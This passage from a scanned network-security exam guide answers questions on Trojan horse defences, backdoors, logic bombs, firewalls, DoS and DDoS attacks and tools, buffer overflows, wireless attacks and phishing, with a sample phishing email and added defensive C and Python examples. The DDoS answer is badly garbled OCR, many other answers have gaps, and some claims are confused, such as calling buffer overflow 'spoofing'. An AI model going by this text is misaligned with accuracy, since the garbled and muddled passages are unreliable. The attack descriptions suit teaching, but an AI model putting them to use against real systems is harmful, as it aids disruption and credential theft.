Ans. Consider a user named Boby and a file containing a critically sensitive character string, which is created by Boby with read/write permission on his own behalf only. When a hostile user Alicia gets legitimate access to the system and installs both a Trojan horse program and a private file to be used in the attack as a “back pocket”, Alicia gives only write permission to Boby and read/write permission to herself, as shown in fig. 5.4 (a). Now, advertising it as a useful utility, Alicia induces Boby to invoke the Trojan horse program. When the program is executed by Boby, it reads the sensitive character string from Boby’s file and copies it into Alicia’s back-pocket file, as shown in fig. 5.4 (b).

[Fig. 5.4 Trojan Horse Defense — panels (a) to (d); access control list of the back-pocket file: Alicia R/W, Boby W.]

As a defense, as shown in fig. 5.4 (c), consider a secure operating system. The users and processes are assigned security levels at logon, on the basis of the terminal from which the computer is being accessed and the user identified by password/ID. In fig. 5.4 (c), there are two security levels, viz., sensitive and public, ordered in such a way that sensitive is higher than public. Processes owned by Boby and Boby’s data file are assigned the security level sensitive, and Alicia’s file and processes are restricted to public.
Now if a Trojan horse program is invoked by Boby, then the program acquires Boby’s security level. So it is able to read the sensitive character string, under the simple security property. When it attempts to store the string in a public file (the back-pocket file), the *-property is violated and the attempt is disallowed by the reference monitor. Hence, the attempt to write into the back-pocket file is denied even though the access control list permits it. Hence, the security policy takes precedence over the access control list mechanism and thus the system is defended from Trojan horse attack.
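The argument above rests on a reference monitor that consults both the discretionary access control list and the two mandatory rules. The following C program is an added example, not the textbook’s code: it implements such a monitor for the Boby/Alicia scenario of fig. 5.4, with the user names, file names and the two security levels taken from the answer and the ACL entries constructed to match fig. 5.4 (a). It shows that the Trojan, running at Boby’s level, may read his file but is refused the write into the public back-pocket file although the ACL would allow it.

```c
/* Added example (not the textbook's code): a minimal reference monitor that
 * combines an access control list with the two multilevel-security rules the
 * answer relies on, the simple security property (no read up) and the
 * *-property (no write down). Users, files and levels follow the Boby/Alicia
 * scenario of fig. 5.4; the ACL entries are constructed to match it. */
#include <string.h>

enum level { PUBLIC = 0, SENSITIVE = 1 };
enum mode  { READ = 1, WRITE = 2 };

struct subject { const char *name; enum level clearance; };

struct file {
    const char *name;
    enum level  classification;
    const char *acl_user[2];     /* discretionary ACL: who may do what */
    int         acl_mode[2];
    int         acl_entries;
};

/* Discretionary check: does the ACL grant this user the requested mode? */
static int acl_permits(const struct file *f, const char *user, enum mode m)
{
    for (int i = 0; i < f->acl_entries; i++)
        if (strcmp(f->acl_user[i], user) == 0 && (f->acl_mode[i] & m))
            return 1;
    return 0;
}

/* Mandatory check: a process running at clearance c may read objects at or
 * below c (simple security property) and write objects at or above c
 * (*-property). A Trojan inherits the clearance of the user who runs it. */
static int mls_permits(enum level clearance, enum level classification, enum mode m)
{
    if (m == READ)  return classification <= clearance;  /* no read up   */
    if (m == WRITE) return classification >= clearance;  /* no write down */
    return 0;
}

/* The reference monitor: both mechanisms must agree. Returns 1 = allow. */
int reference_monitor(const struct subject *s, const struct file *f, enum mode m)
{
    return acl_permits(f, s->name, m) &&
           mls_permits(s->clearance, f->classification, m);
}

/* Scenario of fig. 5.4 (c): Boby and his data file are sensitive; Alicia, her
 * processes and the back-pocket file are public. The ACL on the back-pocket
 * file grants Alicia read/write and Boby write, as in fig. 5.4 (a). */
static const struct subject BOBY   = { "Boby",   SENSITIVE };
static const struct subject ALICIA = { "Alicia", PUBLIC };

static const struct file BOBY_FILE = {
    "boby_data", SENSITIVE, { "Boby" }, { READ | WRITE }, 1
};
static const struct file BACK_POCKET = {
    "back_pocket", PUBLIC, { "Alicia", "Boby" }, { READ | WRITE, WRITE }, 2
};

/* The Trojan, invoked by Boby, runs at Boby's level: reading his own file
 * satisfies the simple security property, so it is allowed ... */
int trojan_can_read_secret(void) { return reference_monitor(&BOBY, &BOBY_FILE, READ); }

/* ... but copying the string into the public back-pocket file is a write
 * down, so the *-property denies it although the ACL alone would permit it. */
int trojan_can_leak_secret(void)     { return reference_monitor(&BOBY, &BACK_POCKET, WRITE); }
int acl_alone_would_allow_leak(void) { return acl_permits(&BACK_POCKET, "Boby", WRITE); }

/* Alicia reading her own public file violates no rule. */
int alicia_can_read_back_pocket(void) { return reference_monitor(&ALICIA, &BACK_POCKET, READ); }
```

The point the test makes is the one the answer makes: `acl_alone_would_allow_leak()` is 1, yet `trojan_can_leak_secret()` is 0, because the mandatory policy is evaluated in addition to the ACL and takes precedence.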


Q.31. Write short note on backdoors.
Ans. A backdoor is a way for a hacker to retain access to a machine after the intrusion has been detected and remedied or completely disabled.
This technique is effective because when a hacking attempt occurs the system administrator usually focuses on looking for something odd in the system, leaving all existing services unchecked. The backdoor technique is simple but efficient. The hacker can get back into the machine with the least amount of visibility in the server logs. In most cases, the backdoored services let the hacker in with higher privileges.
Remote Administration Trojans (RATs) are a class of backdoors used to enable remote control over a compromised machine. They provide apparently useful functions to the user, and at the same time, open a network port on the victim computer. Once the RAT is started, it behaves as an executable file, interacting with certain registry keys responsible for starting processes and sometimes creating its own system services. Unlike common backdoors, RATs hook themselves into the victim’s operating system and always come packaged with two files — the client file and the server file. The server is installed in the infected machine, and the client is used by the intruder to control the compromised system.
Q.32. Write short note on logic bomb. (R.G.P.V., Nov. 2019)
Ans. A logic bomb is a program, or portion of a program, which lies dormant until a specific piece of program logic is activated. In this way, a logic bomb is very analogous to a land mine. The most common activator for a logic bomb is a date. The logic bomb checks the system date and does nothing until a pre-programmed date and time is reached. At that point, the logic bomb activates and executes its code. The most dangerous form of the logic bomb is a bomb that activates and executes its code when something doesn’t happen. Because a logic bomb does not replicate, it is very easy to write a logic bomb program. This also means that a logic bomb will not spread to unintended victims. In some ways, a logic bomb is the most civilized programmed threat, because a logic bomb must be targeted against a specific victim.


Q.33. Write short note on firewalls. (R.G.P.V., Nov. 2019)
Ans. Conceptually, a firewall can be compared with a sentry standing outside an important person’s house, i.e., such as the nation’s president. This sentry keeps an eye on and physically checks every person that enters into or comes out of the house. If the sentry senses that a person wishing to enter the president’s house is carrying a knife, the sentry would not allow the person to enter. Similarly, even if the person does not possess any restricted objects, but somehow looks suspicious, the sentry can prevent that person’s entry.
A firewall acts like a sentry. If implemented, it guards a corporate network by standing between the network and the outside world. All traffic between the network and the Internet in either direction must pass through the firewall.

[Fig. 5.5 A Firewall — the firewall sits between the network backbone and the link to the outside.]

Of course, technically, a firewall is a specialized version of a router. In addition to the basic routing functions and rules, a router can be configured to perform the firewall functionality, with the help of additional software resources.
The characteristics of a good firewall implementation can be described as follows —
(i) All traffic from inside to outside, and vice versa, must pass through the firewall. This can be achieved if all the access to the local network is first physically blocked and access only through the firewall is permitted.
(ii) Only the traffic authorized by the local security policy should be allowed to pass through.
(iii) The firewall itself must be strong enough, so as to render attacks on it useless.


DoS AND DDoS ATTACKS, BUFFER OVERFLOW, ATTACKS ON WIRELESS NETWORKS, PHISHING — METHODS OF PHISHING, PHISHING TECHNIQUES

The motive of attackers for carrying out these types of attacks is not definite. Either they want to slow down a network or they want to destroy the network completely for creating problems to users. The attackers in this type of attack mainly focus on the computers which are connected to the Internet.
In the earliest type of DoS attacks, messages were sent repeatedly to the victim machine. Since most machines at that time had resources that could be depleted easily, these machines were vulnerable to such attacks. It was common for the attacker to send mails or malicious packets from fake source addresses so that they cannot be caught. So these attackers and packets were difficult to recognize as coming from malicious machines, and to filter them at a firewall.
Now attackers are focusing on websites or services which are hosted on high-profile web servers like online shopping sites, banks, online and debit card payment systems etc. To apply this type of attack, the buffer overflow technique is used, which is also known as spoofing. In buffer overflow technique the attacker fills the ... of the victim’s machine with continuous requests, spoofing the IP address. Since the attacker’s address is fake, the victim’s machine waits to ... The bandwidth of the network is then consumed, the requests which are not fake cannot be served, and the network finally breaks down. Some signs of DoS attacks, which were given by the United States Computer Emergency Response Team —
(i) When the users try to open a file or access a website then it takes more time than it should take. It means that the performance of network is slow.
(ii) When we want to access a website and the website is unavailable.
(iii) When the users get unexpected e-mails or spams then it is also a sign of DoS attack.


which is als 


Q.35. Briefly discuss the various types of DoS attacks.
Ans. Some of the DoS attacks are as follows —
(i) IP Spoofing — IP spoofing is forging of an IP packet address. In particular, the source address in the IP packet is forged. Since network routers use packet destination address to route packets in the network, the only time a source address is used is by the destination host to respond back to the source host. So forging the source IP address causes the responses to be misdirected, thus creating problems in the network. Many network attacks are a result of IP spoofing.
(ii) Smurf Attack — In this attack, the intruder sends a large number of spoofed ICMP Echo requests to broadcast IP addresses. Hosts on the broadcast multicast IP network, say, respond to these bogus requests with ICMP Echo replies. This may significantly multiply the ICMP Echo replies to the hosts with spoofed addresses.
(iii) Buffer Overflow Attack — In this attack, the attacker floods a carefully chosen field such as an address field with more characters than it can accommodate. These excessive characters, in malicious cases, are actually executable code, which the attacker can execute to cause havoc in the system, effectively giving the attacker control of the system. Since anyone with little knowledge of the system can use this type of attack, buffer overflow has become one of the most serious classes of security threats.
(iv) Ping of Death Attack — This vulnerability is used to hang remote systems so that no user could use its services. A system attacker sends IP packets that are larger than the 65,536 bytes allowed by the IP protocol. Many operating systems, including network operating systems, cannot handle these oversized packets, so they freeze and eventually crash.


(v) Teardrop Attack — The teardrop attack uses ... that causes fragmentation of a TCP packet. It exploits a reassembly ... and causes the victim system to crash or hang.
(vi) SYN Attack — The SYN attack exploits TCP’s three-way handshake. In a normal three-way handshake, the client sends a SYN packet to the host, the host replies to this packet with a SYN ACK packet, and then the client responds with a TCP ACK (acknowledgement) packet.
Now, in a SYN attack too, several SYN packets are sent to the server, but all these SYN packets have a bad source IP address. When the target system receives these SYN packets with bad IP addresses, it tries to respond to each one of them with a SYN ACK packet. Now, the target system ... ACK ... these requests until the remote target system gets an ACK message. Hence, ... occupy valuable resources of the target machine. To actually affect the target system, a large number of SYN packets with bad IP addresses have to be sent. Since these packets have a bad source IP, they queue up, take up resources and memory of the target system and eventually crash, hang or reboot the system.
A land attack is same as a SYN attack, the only difference being that instead of a bad IP address, the IP address of the target system is used.
(vii) SYN Flooding — A three-way handshake is used by the TCP protocols to initiate a connection between two network elements. During the handshake, the port door is left half open. A SYN flooding attack is flooding the target system with so many connection requests coming from spoofed source addresses that the victim server cannot complete them because of the bogus source addresses. In the process all its memory gets hogged up and the victim is thus overwhelmed by these requests and can be brought down.
(viii) Sequence Number Sniffing — In this attack, the intruder takes advantage of the predictability of sequence numbers used in TCP ... The attacker then uses a sniffed text sequence number to ... legitimacy.

Q.36. What are DoS attacks ? Discuss any three classified DoS attacks in brief. (R.G.P.V., Dec. 2010, June 2011)
Or
What do you mean by denial of service ? Write various denial of service attacks. Explain any two. (R.G.P.V., Dec. 2013)
Ans. DoS Attacks — Refer to Q.34.
Types of DoS Attacks — Refer to Q.35.

Q.37. Discuss the various tools used for DoS attack.
Ans. There are ... tools that use different ... But the motive of the attacker is ... so that a victim’s computer ... number of requests ... until the system is unavailable to users. Although in DoS the attacker does not want to access the system or network, so it is an unsophisticated attack, therefore it is called attack of last resort. Here the attacker harms the victim’s machine. ... tools to launch the DoS attack are given below —
(i) Targa — Targa is capable of running eight different DoS attacks. Using this tool the attackers can run an individual attack or any set of attacks until it gets ...
(ii) Ne... — By using this tool, the attackers are enabled to generate packets of spoofed address ...
(iii) Jolt2 — This type of ... on Windows based machines ... networking code. This tool causes consumption of CPU time on processing of illegal packets.
(iv) Trouble — This tool is also a remote tool. It floods the ... This is called remote flooder or remote bomber.
(v) Pinger — If an attacker is targetting the whole network then this tool can be used. Using this tool the attacker is enabled to send a large ... of ICMP to a remotely targetted network.

Q.38. How can the DoS attacks be prevented ?
Ans. There are many preventing measures of DoS attacks, some of them are as follows —
(i) Router filters should be implemented time-to-time. It will reduce the risk of certain DoS attacks.
(ii) A baseline should be established for ordinary activities. This baseline should be used to observe the system’s performance, disk usage, CPU usage or ...
(iii) ..., we should check our physical security ...
(iv) We should install a ...
(v) Regular backup sc...
(vi) Password policies for highly privileged accounts like Unix root and Microsoft Windows N... should be established and maintained properly.
(vii) ... unused and unessential services on our system, ... advantage of these services to execute DoS, ... then should uninstall those services.
(viii) Patches can be installed to avoid TCP SYN flooding.
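Two of the defensive points above, router filters (Q.38 (i)) and the half-open connections a SYN attack leaves behind (Q.35 (vi) and (vii)), can be made concrete in a few lines. The C program below is an added example, not the textbook’s code: an ingress filter that drops packets arriving from outside with a source address inside the assumed internal prefix (10.0.0.0/8), and a counter of pending half-open handshakes per source that flags a source exceeding a threshold. The packet trace is constructed for the example, with documentation addresses as the external hosts.

```c
/* Added example (not the textbook's code): two defensive checks drawn from
 * Q.35 (vi)/(vii) and Q.38 (i). First, an ingress filter of the kind a
 * border router applies: a packet arriving on the external interface whose
 * source address claims to be inside our own network is spoofed and dropped.
 * Second, a half-open connection counter that flags a source that leaves
 * many SYN_RECEIVED entries behind, the symptom of a SYN flood. The packet
 * records below are constructed for the example. */
#include <stdint.h>
#include <stddef.h>

/* Minimal view of a TCP segment as seen by the filter. */
struct pkt {
    uint32_t src;          /* source IPv4 address, host byte order */
    uint32_t dst;
    int      syn, ack;     /* TCP flags */
    int      from_outside; /* 1 = arrived on the external interface */
};

/* IPv4 dotted quad as a host-order integer, e.g. IP(10,0,0,1). */
#define IP(a,b,c,d) (((uint32_t)(a)<<24)|((uint32_t)(b)<<16)|((uint32_t)(c)<<8)|(uint32_t)(d))

/* Our internal prefix, assumed to be 10.0.0.0/8 for the example. */
#define INTERNAL_NET  IP(10,0,0,0)
#define INTERNAL_MASK IP(255,0,0,0)

/* Ingress filter (Q.38 (i)): drop packets from outside that carry an inside
 * source address. Returns 1 = drop. */
int ingress_filter_drops(const struct pkt *p)
{
    return p->from_outside && (p->src & INTERNAL_MASK) == INTERNAL_NET;
}

/* Half-open tracking: a SYN without ACK opens an entry, the final ACK closes
 * it. Count what is left per source and flag sources above a threshold. */
#define MAX_SRC 16
struct half_open { uint32_t src; int pending; };

static int find_or_add(struct half_open *t, int *n, uint32_t src)
{
    for (int i = 0; i < *n; i++) if (t[i].src == src) return i;
    if (*n == MAX_SRC) return -1;
    t[*n].src = src; t[*n].pending = 0;
    return (*n)++;
}

/* Feed packets that passed the ingress filter; returns the number of sources
 * whose pending half-open count exceeds `threshold` and writes the first
 * such source to *offender (0 if none). */
int syn_flood_sources(const struct pkt *pkts, size_t count, int threshold, uint32_t *offender)
{
    struct half_open table[MAX_SRC];
    int n = 0, flagged = 0;
    *offender = 0;
    for (size_t i = 0; i < count; i++) {
        if (ingress_filter_drops(&pkts[i])) continue;      /* spoofed insider */
        int k = find_or_add(table, &n, pkts[i].src);
        if (k < 0) continue;                               /* table full */
        if (pkts[i].syn && !pkts[i].ack) table[k].pending++;   /* SYN_RECEIVED */
        else if (pkts[i].ack && !pkts[i].syn && table[k].pending > 0)
            table[k].pending--;                            /* handshake done */
    }
    for (int i = 0; i < n; i++)
        if (table[i].pending > threshold) {
            if (!*offender) *offender = table[i].src;
            flagged++;
        }
    return flagged;
}

/* Constructed trace: one legitimate client completing two handshakes, one
 * spoofed packet claiming an internal source, and one external host sending
 * SYNs that are never acknowledged. */
static const struct pkt TRACE[] = {
    { IP(198,51,100,7), IP(10,0,0,5), 1, 0, 1 }, { IP(198,51,100,7), IP(10,0,0,5), 0, 1, 1 },
    { IP(198,51,100,7), IP(10,0,0,5), 1, 0, 1 }, { IP(198,51,100,7), IP(10,0,0,5), 0, 1, 1 },
    { IP(10,0,0,99),    IP(10,0,0,5), 1, 0, 1 },  /* spoofed: inside address from outside */
    { IP(203,0,113,9),  IP(10,0,0,5), 1, 0, 1 }, { IP(203,0,113,9), IP(10,0,0,5), 1, 0, 1 },
    { IP(203,0,113,9),  IP(10,0,0,5), 1, 0, 1 }, { IP(203,0,113,9), IP(10,0,0,5), 1, 0, 1 },
    { IP(203,0,113,9),  IP(10,0,0,5), 1, 0, 1 },
};
#define TRACE_LEN (sizeof TRACE / sizeof TRACE[0])

/* Convenience: run the trace with a threshold of 3 pending handshakes. */
int demo_flagged_sources(uint32_t *offender)
{
    return syn_flood_sources(TRACE, TRACE_LEN, 3, offender);
}
```

On the trace, the legitimate client ends with no pending entries, the spoofed packet never reaches the table, and the external host with five unanswered SYNs is the single flagged source. The filter cannot catch spoofed sources that lie outside the internal prefix, which is why the half-open count is the second line of defense.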
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0.39. What are DDoS attacks ? Explai; i 
DDoS attack, ints Also dis 
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e inst DDoS 
ibe the 3 lines of defence against 
oS ? Describ ( 


R.GP.V., Dec. 2012) 
is DD 
USS the tools , " what HA 
Ans. DDoS is also known as distributed denial of sery; Sed i, P^ pos Refer to ee Three lines of defence aga 

type of attack an attacker may use one computer to attack o, Ice attack In thi a Ans: p against pDoS de 
An attacker can take control of your Computer by using s another Computes | pefene fetlows = : n and Prevention (Before the cae 
9r security weaknesses of System. Now once taking co, Tabilic T ps are 95 ck Prevention = Pack attempts without denying 
he/she enforce the computer to Send a vast amount of ntro] Om es (tac i) Atta ictim to endur 
a website. Since the attacker is using i 


; icies for resource 

o hniques include enforcing npe dissi 

isms Techn required. > 
nts. rces as 

jimate clie backup resou! 


: inimize the 
m idin Internet to minimize 
. yo legit tion and providing d protocols on the 
ni 


4 s an 
synchronized fo ‘ onsump modify system: 

Cks are applied ig Called “ i Attacking on mechanisms OS attacks. 
stems which are attackin, are known as “seton MANY victim» o 

al of service attack mechanis; 


. — These 

. ing (During the Attack) 3 
ces Detection and filtering ( nd immediately. This 

P^ | demo asc tarts and respo i 

: ™ is launche bs aD ^ to find the attack as s Detection involves looking for 

and time. DDoS attack mechanism can also be applied by malware ri dat chanisms tries f the attack on the target. De 

is the example of this. Prior to release of the malware the ` res rn 

includes hardcoding the data forget, therefore to launch 

instruction is need 


m i Itering out packets likely 
of behaviour. Response involves filtering 

the atta E attacks suspicious patterns 

CK no furthe 


attacks. ification (During and After 
Ombie agent, wh to be part of poses Source Traceback and entific i pé ii id 
ack te je This is an attempt to a es not yield nas 
any e future attacks. Although, this m 
P ting 
step in preven 


YN i iti ngoing attack. 
if at all, to mitigate an o l 
Some DDoS attack tools are as follows —

(i) Tribe Flood Network (TFN) — Tribe flood network includes a set of programs to launch different DDoS attacks.

(ii) Stacheldraht — It acts as a DDoS agent and is … for Linux and Solaris operating systems.

(iii) Trinoo — Trinoo systems are believed to be set on thousands of systems on the Internet that have been compromised by a remote buffer overrun exploit. It is a set of computer programs.

(iv) Shaft — In this tool the client controls the size of flooding packets and the duration of the attack, though it is a packet flooding attack. It is conceptually like Trinoo.

(v) MStream — In this tool communication is performed through TCP and UDP packets. Spoofed TCP packets with the ACK flag set are used in this tool to attack the target. Here access to the packet handler is password protected. This tool has a unique feature that the handler(s) are informed of users' access attempts, successful or not.

Q.40. Write short note on DDoS. (R.GP.V., Dec. 2011)

Ans. Refer to Q.39.

Q.41. How can DoS and DDoS attacks be performed?

Ans. DoS Attack — Refer to Q.34.
DDoS Attack — Refer to Q.39.

Q.43. What do you mean by buffer overflow?

Ans. … in buffer overflow. In this attack the … of a program … adjacent memory is overwritten by the extra data, which may contain other program variables and program flow control data. The result of data overflow may be erratic program behaviour, including memory access errors, incorrect results, execution of a code or altering the program, … termination etc. The inputs … designed to trigger the buffer overflow. Buffer overflow … how the program operates, … can be prevented by bounds checking. C and C++ are common programming languages in which there is no built-in protection against overwriting data in any part of memory or accessing …; there is no automatic check that the data written to an array is within the boundaries of that array. When a program or process tries to store more data in a buffer than it can hold, buffer overflow occurs. Since buffers can contain only a limited amount of data, the extra data, which has to go somewhere, can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. … is a common security attack on data integrity, … requires basic knowledge of process memory layout …


… is important. There is no automatic check that the data written to an array stays within its bounds; for example, the following program writes past the end of a buffer —

    int main(void)
    {
        int a[20];      /* buffer of 20 integers: valid indices are 0 to 19 */
        a[30] = 1;      /* writes outside the array; overwrites adjacent memory */
        return 0;
    }

Q.44. Explain the various types of buffer overflow.

Ans. Types of buffer overflow are as follows —

(i) Stack-based Buffer Overflow — When a program writes to a memory address on the program's call stack outside of the intended data structure, usually a fixed length buffer, then stack buffer overflow occurs. The characteristics of stack-based programming are —

(a) The memory space in which automatic variables are allocated is known as stack.

(b) Usually function parameters have garbage until initialized, because they are allocated on the stack and not automatically initialized by the system.

(c) The reference to the variable in stack is removed on completion of the function cycle.

To manipulate the program in various ways the attacker may exploit stack-based buffer overflow, since —

(a) Overwriting a variable that is near the … on the stack may benefit the attacker.

(b) Execution will resume at the return address as specified by the attacker, once the function returns.

(c) A function pointer which is to be executed …

(ii) NOPs — An assembly language instruction/command that does nothing is called no operation (NOP) or no operation performed (NOOP). The state of status flags or memory locations in the code is not changed by this command. By using NOP the developer can force memory alignment, act as a place holder and later on replace it by an active instruction during program development. Since the exact value of the instruction pointer is indeterminate, the NOP slide, which is created by the NOP opcode, allows … By increasing the size of the target stack buffer with the NOP …, the … address of the buffer. The attackers can pad their code with NOP code to increase the chance of finding the exact memory address. If it is done then a larger section of the stack is corrupted with the NOP instructions, and … on top of the buffer where the shellcode (a small piece of code used as a payload in the exploitation of a software vulnerability) is located, at the end of the attacker's supplied data.

(iii) Heap Buffer Overflow — Heap buffer overflow may be … by the programmer and it occurs in the heap … When an application copies more data into a buffer than the buffer was designed to hold, then the buffer overflow occurs. A routine which copies data into a buffer without verifying whether the source will fit into the destination or not is vulnerable to exploit. The characteristics of heap-based programming are —

(a) In a heap, dynamic objects are allocated because it is a memory … space. The functions new( ), calloc( ) and malloc( ) allocate dynamically … in memory which is allocated by the heap.

(b) … the heap uses space …

(c) The variables which are declared dynamically are declared before execution. Memory allocated by the application at run-time on the heap is dynamic and normally contains program data.

Q.45. Write down the techniques to minimize the buffer overflow.

Ans. Since all the attacks cannot be prevented, there are some techniques which can reduce these attacks —

(i) Assessment of Secure Code — We have read that when any application tries to copy more data than it was designed to hold, then buffer overflow occurs. Programmers should have the knowledge to minimize the use of vulnerable C functions available in the library, such as strcpy( ), strcat( ), sprintf( ), etc., which operate on null-terminated strings and perform no bounds checking.

(ii) Disable Stack Execution — Malicious code which resides in the stack comes in as an input argument to the program; it does not reside in the code segment. A segmentation violation will be caused when any code attempts to execute other code residing in the stack. The solution of this problem is to prevent the stack from executing any instructions. However, the solution is not easy to implement, although it is possible in Linux. Trampoline functions are used by some compilers to implement taking the address of a nested function, which relies on the system stack being executable. A trampoline is a small piece of code created at run-time when the address of a nested function is taken. Trampoline requires the stack to be executable … in the stack frame of the containing function.

(iii) Compiler Tools — Since the compilers have improved in optimization and the checks they perform over the years, they offer warnings on the use of unsafe constructs such as gets( ), strcpy( ), etc. If such warnings are displayed, then the programmer should be advised to restructure the code.

(iv) Dynamic Run-time Checks — In this scheme, to prevent attacks, an application has restricted access. In this scheme the preloaded safety code is executed before an application. A safer version of standard functions can be provided by this preloaded code, or it can be ensured by it that no return addresses are overwritten.
Q.46. What are wireless network attacks? Explain the various types of attacks on wireless networks.

Ans. If anyone is talking about the wired and wireless networks, he/she wants to focus on one thing in both networks, i.e., trust (security technique). The workstations on a wired network are directly under control of the administrator, and wired networks are assumed to be one of the trusted. While in a wireless network someone could sit around the network with a laptop and can access the network. Therefore wireless workstations are assumed to be one of the untrusted. On the basis of this the administrators focus on both networks when it comes to guarding network security, although they extremely focus on wireless networks in comparison to wired networks.

The unauthorized access of a wireless network by penetrating its security is known as wireless cracking. The cracking of WLANs demands less technological skill. There are various techniques to attack on wireless networks. Some of them are as follows —

(i) Sniffing — It is the simplest attack among all attacks. The wireless data which is being broadcast on an unsecured network can be easily intercepted using sniffing. The information about the active/available Wi-Fi networks is gathered by a technique called reconnaissance. The sniffers are remotely installed on the victim's system and such activities are conducted —

(a) Scanning of wireless networks

(b) Detection of SSID

(c) Collection of MAC address

(d) Collection of frames to crack WEP.

(ii) Spoofing — The main objective of this attack is to gain an illegal advantage by changing/modifying the identity of a legitimate user by falsifying his/her data. The attacker simply creates a new network with strong signals and often launches an attack on a wireless network by copying a SSID in the same manner as the legitimate network. By doing so computers are connected to the spoofed network instead of the real one. The computers need not be informed to access the network while a wireless network is installed, because as soon as they move within signal range they automatically access it, so the attackers can conduct this activity easily.

Different types of spoofing are as follows —

(a) MAC Address Spoofing — Changing the assigned media access control (MAC) address of a networked device to another one is known as MAC address spoofing. In this type of spoofing attackers can bypass the access control lists on servers or routers by either hiding a computer on a network or allowing it to impersonate another network device.

(b) IP Spoofing — The process of creating IP packets with a forged source IP address, so that the identity of the sender is concealed, is known as IP spoofing. In this, a variety of techniques is used to find an IP address that is of a trusted host. Now the attacker modifies the packet headers so that it appears that the packets are coming from the host that is legitimate.

(c) Frame Spoofing — Frames valid as per the 802.11 standard are injected by the attacker. Such frames cannot be detected easily unless the address is …, since frames are not authenticated in 802.11 networks.

(iii) Man in the Middle Attack (MITM) — In this attack the attacker intercepts the communication between two hosts and may modify it. For example, S inserts itself between all communications between hosts P and Q without the knowledge of P and Q. Hence all messages from P reach Q only via S, and vice versa.

(iv) Encryption Cracking — … is to use W…, which is quite easy for attackers to crack. An important step is to …, which is much harder to crack.
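A defender's view of the SSID and MAC spoofing described under (ii) and (a), as an added Python example that is not part of the book: beacon observations are compared against an inventory of the organisation's own access points, reporting an "evil twin" (our SSID advertised by a radio we do not own) and a BSSID collision (one BSSID beaconing on two channels at once, which is what a copied MAC looks like to a sensor). The inventory, the BSSIDs and the beacon records are constructed for the example.

```python
"""Rogue access point / SSID spoofing detection (added example).

The inventory and the beacon observations below are constructed; a real
deployment would take them from the organisation's AP list and from a
wireless scanner or WIDS sensor.
"""
from collections import defaultdict

# Constructed inventory: SSID -> set of BSSIDs (radio MAC addresses) we own.
KNOWN_APS = {
    "CorpWiFi": {"00:11:22:33:44:01", "00:11:22:33:44:02"},
}

# Constructed beacon observations: (bssid, ssid, channel, signal_dbm).
OBSERVATIONS = [
    ("00:11:22:33:44:01", "CorpWiFi", 6, -60),
    ("00:11:22:33:44:02", "CorpWiFi", 11, -65),
    ("de:ad:be:ef:00:01", "CorpWiFi", 6, -30),   # our SSID from an unknown radio, strong signal
    ("00:11:22:33:44:01", "CorpWiFi", 1, -35),   # our BSSID also seen on another channel
    ("aa:bb:cc:dd:ee:ff", "Guest", 1, -70),      # unrelated network, ignored
]


def find_rogue_aps(observations, known=KNOWN_APS):
    """Return a list of findings (dicts) for two spoofing patterns:
    'evil-twin'      : an SSID we own advertised by a BSSID not in the inventory
    'bssid-collision': one BSSID beaconing on more than one channel at once
    """
    findings = []
    channels_by_bssid = defaultdict(set)
    for bssid, ssid, channel, signal in observations:
        channels_by_bssid[bssid].add(channel)
        if ssid not in known:
            continue                      # not our network, nothing to compare against
        if bssid not in known[ssid]:
            findings.append({"type": "evil-twin", "ssid": ssid, "bssid": bssid,
                             "channel": channel, "signal_dbm": signal})
    for bssid, chans in channels_by_bssid.items():
        if len(chans) > 1:
            findings.append({"type": "bssid-collision", "bssid": bssid,
                             "channels": sorted(chans)})
    return findings


if __name__ == "__main__":
    for finding in find_rogue_aps(OBSERVATIONS):
        print(finding)
```

The strong signal on the evil twin is reported rather than used as a criterion, because a legitimate AP close to the sensor is also strong; the inventory match is the reliable test. The channel-collision heuristic needs a per-BSSID channel inventory in environments where access points change channels automatically.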
Q.47. How can a wireless network be secured? Explain …

Ans. The security features of wireless networks are still …, but now they are not time-consuming and … The security of a wireless network can be improved by the following steps —

(i) Enable your device with … encryption.

(ii) The default SSID should be changed.

(iii) The default settings of all the equipments/components of wireless networks should be changed.

(iv) Filtering of MAC address should be enabled.

(v) SSID of a wireless network should not be broadcast.

(vi) … should be disabled.

(vii) … which can be easily identified should not be provided.

(viii) We should connect our system only to a secured wireless network.

(ix) Firmware of a router should be …

There are some tools which can also be used to secure a wireless network —

(i) … — It is based on signature analysis, and advanced intrusion detection for wireless LANs is provided by this tool. It is also based on policy and protocol assessment, policy deviation and …

(ii) Google Secure Access — The Internet traffic is encrypted by Google Secure Access and sent through Google's servers on the Internet. Anyone can go online for free by accessing the network with the name "Google Wi-Fi", which is secured by Google's VPN, with a Wi-Fi enabled device and a Google Account.

(iii) Wireless Network … Tool — It is a freeware tool which detects all computer names, MAC and IP addresses utilizing a single wireless network and helps to protect a wireless network. It reveals all computers, both authorized and unauthorized, that have access over the wireless network.
Q.48. Discuss the phishing.

Or

Explain the term phishing in detail. (R.GP.V., Dec. 201…)

Ans. Phishing, in its most common form, is the process of luring a victim to a fake Website by clicking on a link. The victim usually encounters the link in an e-mail message sent to him or on a Webpage being browsed by him, as in the following examples —

(i) Click here www.luckyDraw.com to claim your $1,000,000 Prize!

(ii) Urgent attention of all TrueBank Account Holders & Customers. Following a security breach, we wish to inform all our existing customers that we need to verify their account details. Kindly click here www.Truebank.com to proceed.

(iii) The ultimate experience with the hottest babes in town. Click here for further details www.HotBabesAndHunks.com

Once the victim clicks on the link, … as shown in fig. 5.6, … sensitive information such as his credit card number or a password. For example, one of the highly publicized … in recent times has been the phishing attack …

TrueBank

Dear customer

This is to confirm that you have recently attempted to withdraw Rs.5000 from your checking account while in another country.

In case this information is incorrect, it is possible someone may have gained access to your account. To ensure safety of your account please visit our Website via the link given below to verify your personal information.

http://www. … cus …

We require your immediate cooperation to rectify this discrepancy.

Thank you,
TrueBank

Fig. 5.6 An Example of a Phishing Attempt

Phishing attempts often use URLs that are very similar to the real URL. For example, the real URL may be www.TrueBank.com but the fake one may be … The fake URL corresponds to a Website owned and operated by the attacker. Once the user clicks on the fake link, he/she is presented with a page that has the same look and feel as that of the real Website. He/she is then asked to enter his/her login name and password. Then he/she may be directed to the true site after entering the password. But, by then, the attacker has harvested sensitive information like his/her password.


Q.49. Explain the different methods of phishing.

Ans. The three basic methods phishers employ are as follows —

(i) Impersonation — Impersonation is the most popular and simplest method of deceit. It consists of a completely constructed fake site that the recipient is deceived into visiting. This fake site contains images from the real Web site and might even be linked to the real site.

